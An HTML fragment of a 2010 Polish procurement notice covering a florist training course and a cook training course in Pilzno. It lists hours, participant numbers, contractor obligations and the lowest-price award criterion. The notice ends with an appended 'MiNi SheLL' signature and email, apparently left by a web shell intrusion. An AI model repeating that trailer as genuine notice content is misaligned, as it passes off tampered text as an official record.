<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kurs będzie kierowany do uczestników rekrutowanych przez Zamawiającego (od 5 do 7 osób), termin realizacji: od VIII do IX 2010 roku. Miejscem realizacji kursu: miasto Pilzno lub miejsce oddalone od siedziby Zamawiającego max. 15 km. 

Liczba godzin (1 godz. = 60 min.): zajęć teoretycznych minimum: 30 i praktycznych minimum 50, w salach odpowiednich do specyfiki kursu. 
Celem kursu jest przygotowanie do pracy w kwiaciarni, tworzenie kompozycji kwiatowych na różne okazje oraz sprzedaż.

Wykonawca w cenie kursu zapewnia: ubezpieczenie uczestników od NW na czas trwania kursu, organizację i przebieg kursu, wynagrodzenie wykładowców lub instruktorów, przygotowanie i zorganizowanie egzaminu końcowego, niezbędne materiały szkoleniowe oraz kwiaty i inne wymagane materiały, stały dostęp dla uczestników do wody mineralnej, kawy i herbaty, 1 gorący posiłek (drugie danie) w każdym dniu kursu, wynajem sal, zajęcia odbywają się w salach wskazanych przez Wykonawcę, przeprowadzenie egzaminu końcowego, wydanie zaświadczenia zgodnego z Rozporządzeniem Ministra Edukacji i Nauki z dnia 3 lutego 2006 roku w sprawie uzyskiwania i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych (Dz. U. Nr 31, poz. 216)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 2.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> CZĘŚĆ V: KUCHARZ:.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kurs będzie kierowany do uczestników rekrutowanych przez Zamawiającego (od 5 do 6 osób), termin realizacji: od XI do XII 2010 roku. Miejscem realizacji kursu: miasto Pilzno. 

Liczba godzin (1 godz. = 60 min.): zajęć teoretycznych minimum 66 i praktycznych minimum 110. 
Celem kursu jest teoretyczne i praktyczne przygotowanie uczestników do egzaminów końcowych według wymaganych przepisów prawa.

Wykonawca w cenie kursu zapewnia: badania profilaktyczne uczestników zgodnie z wymaganiami do specyfiki danego kursu, ubezpieczenie uczestników od NW na czas trwania kursu, organizację i przebieg kursu, przygotowanie do egzaminu końcowego, opłata za przeprowadzenie egzaminu, niezbędne materiały szkoleniowe, odzież ochronna, które zawiera logo Europejskiego Funduszu Społecznego                       w widocznym miejscu, 1 gorący, jednodaniowy posiłek w każdym dniu kursu oraz w dniu egzaminu (drugie danie), stały dostęp dla uczestników do ciepłego napoju, kawy i herbaty, wynagrodzenie wykładowców lub instruktorów, wynajem sal do zajęć, zajęcia odbywają się w salach i warsztatach wskazanych przez Wykonawcę, wydanie zaświadczenia o ukończeniu kursu, które musi zawierać min. szczegółowy wykaz przedmiotów i godzin trwania kursu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 2.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com